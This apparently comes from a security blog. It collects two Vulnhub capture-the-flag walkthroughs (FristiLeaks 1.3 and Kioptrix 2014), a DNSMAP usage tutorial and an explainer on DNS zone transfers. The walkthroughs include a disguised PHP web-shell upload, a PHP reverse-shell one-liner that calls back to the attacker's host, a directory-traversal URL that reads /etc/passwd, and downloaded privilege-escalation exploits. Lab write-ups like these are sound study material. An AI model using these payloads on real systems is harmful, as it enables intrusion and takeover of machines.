FristiLeaks: 1.3 Vulnhub Walkthrough

Hi, Lets see how we rooted Fristi by Ar0xA from Vulnhub.

First Find the IP and do a port scan.

We have only one port open. Lets scan using Nikto and Gobuster.

Now Gobuster.

Visit the pages found. Nothing inetersting. Right?

We need to find something else. Have a look at the following address.

http://192.168.18.80/fristi/

A login page right?

Lets bry breaking it. SQL Injection didnt work. There must be some other ways. Lets have a look at the source code.

<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->

Need to look more 🙂 Scroll down to the end.

<!-- 
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->

Looks like this is base64 encoded. Lets try decoding.

visit https://www.base64decode.org/ for decoding.

Seems like a PNG image? Lets try decoding as an image here: https://base64.guru/converter/decode/image/png

We got an Image.

Hope this is the password. But what about the username? admin? fristi?

they didnt work. Lets try eezeepz.

Yes. We are logged in now. We have a file upload form here. But it accepts only images.

We need to upload a php shell as an image here.

I used this shell

https://github.com/melbinkm/PHPImageShell

Rename the file to shell.php.gif and upload.

Fire up Burpsuite and catch the upload request.

Edit the filename in the request to shell.php.gif and send.

we will get a response as uploaded to uploads directory. Now head to /uploads/shell.php.gif

Now we can set up a listener in our kali machine and connect from this shell.

nc -nlvp 4444

Enter the following command and click Exec.

php -r '$sock=fsockopen("192.168.18.79",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

We got a connection to our Kali machine.

Now its the time for privilege escalation. Use the command uname -a to know the OS version.

Lets search for an exploit.

What about usng this?

https://www.exploit-db.com/exploits/40839

Lets try

Lets download the file using wget.

Time to compile and run the exploit.

Done! we gave a new user firefart with password pass.

Lets see if it is present on /etc/passwd

Yes, Its there at the top. Now lets move to our new account and check our root access.

Yes! we are root now. What about the flag?

Thats all. It took a little more time for me to find the fristi directory, But the privlege escalation part was quick.

Kioptrix: 2014 (#5) Vulnhub Wlakthrough

In this blog post we will see how to root the Kioptrix 2014 Machine from Vulnhub.

First lets find the IP and open posts in the machine using nmap:

nmap 192.168.18.0-255

Here we have the IP. 192.168.18.76

The post 80 is open so there will be some web server running, lets have a look.

Yes, there is a page. Anything behind that? Lets have a look in the source code.

Here we have ‘pChart2.1.3’. Now we need to know what is pChart. Lets have a quick Google search.

The website http://www.pchart.net/ says it is a php based charting library. Now lets look for any existing vulnerabilities in pChart 2.1.3.

Exploit-DB says there are directory traversal and XSS vulnerabilities in pChart 2.1.3

https://www.exploit-db.com/exploits/31173

Lets try that. by visiting the following page.

http://192.168.18.78/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

We have got the /etc.passwd file displayed on the browser.

Now lets try to read the httpd.conf file.

http://192.168.18.78/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

It works!

When we scroll down to the end, we will find something interesting.

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>

</VirtualHost>

If our user agent is Mozilla/4.0, we can connect to port 8080.

Lets try that.

curl -H "User-Agent:Mozilla/4.0" http://192.168.18.78:8080

And the resut is,

We have a hyperlink here, to /phptax/ lets try this on a browser.

I’m using a Firefox extension to switch user agents. Get that here:

https://addons.mozilla.org/en-US/firefox/addon/custom-user-agent-revived/

I’ve installed the extension and activated the custom user agent for our machine.

Now let’s load the page in browser.

Going Inside..

This looks like an app for filling tax forms. Ok. so lets look is there is any known vulnerabilities in this.

According to Exploit-DB, there is an RCE vulnerability in PhpTax.

https://www.exploit-db.com/exploits/21665

Lets try to exploit that with Metasploit.

msfconsole
search phptax

Now lets set the options.

Now enter run to run the exploit.

We got the shell now.

Now use the whoami command to know the current user.

Now use command /bin/sh -i to get a fully interactive shell.

Lets now get the OS version the machine is running.

Use the command uname -a for that.

We are on FreeBSD 9.0. Lets look up online for available exploits.

https://www.exploit-db.com/exploits/28718

We have a privilege escalation exploit at Exploit-DB, Lets try that.

Download the exploit to our Kali machine.

wget https://www.exploit-db.com/download/28718 exploit.c -O exploit.c

Time to send the file to target machine. The target does not have wget or curl. So we will use netcat to transfer the file.

Lets start a listener on our kali machine and send the file on target machine’s /tmp directory.

On target machine,

Now we got the exploit file on our target.

Now lets compile it using gcc.

Time to exploit!

We are root now!

DNSMAP Tutorial, What is it and How to use it?

DNSMAP is a tool for identifying the subdomains of a given domain. It used by pentesters during the information gathering/enumeration phase of infrastructure security assessments.

Subdomain brute-forcing is another technique that should be used in the enumeration stage, as it’s especially useful when other domain enumeration techniques such as zone transfers don’t work.

Installing DNSMAP

If you don’t have DNSMAP installed in your machine, install it using the following command.

sudo apt install dnsmap

DNSMAP Usge

Using DNSMAP we can scan the subdomains of a domain simply by entering the domain name and specifying a wordlist file as shown in the example.

In addition, we can exports the requests to a Comma Seperated Values (CSV) file, set deay in between DNS requests and ignore specific IPs in the enumeration process.

If we don’t specify a wordlist file, the program will load the default wordlist and a random waiting time between requests for us.

dnsmap google.com

Other examples

Specifying custom wordlist.

dnsmap google.com.com -w yourwordlist.txt

Specifying a results file.

dnsmap google.com -r dnsmap_results.txt

Specifying a custom delay between requests

dnsmap google.com -d 3000

DNS Zone Transfer Vulnerability, What is it?

A DNS server is a database that stores IP addresses and domain names and related information. The primary duty of a DNS server is to resolve domain names to IP addresses.

DNS Zone File

DNS Zone file is a simple file that holds the data of a domain. This contains the mapping of domain names. IP addresses and other resources. A DNS Zone file can contain data about multiple subdomains and a DNS server can hold information about multiple servers.

Master and Slave DNS Servers

A Master DNS server is the server which holds the master copy of the zone file. When this file is updated, the slave DNS servers request a copy of this file and update their zone file.

What is Zone Transfer

DNS Zone transfer is the process of copying the DNS information form a master DNS server to a slave DNS server. This is used to copy data from the master DNS server to Slave servers. The primary/master DNS server should allow the zone transfer only to its secondary/slave servers. The Zone Transfer vulnerability arises when the primary server allows zone transfer to anyone who requests it.

By exploiting this vulnerability, attackers can get a copy of the zone file. This may not have a direct impact on the organization. But the attackers can collect a lot of information about the IP addresses and domains which will help in developing a plan to exploit and break into an organization.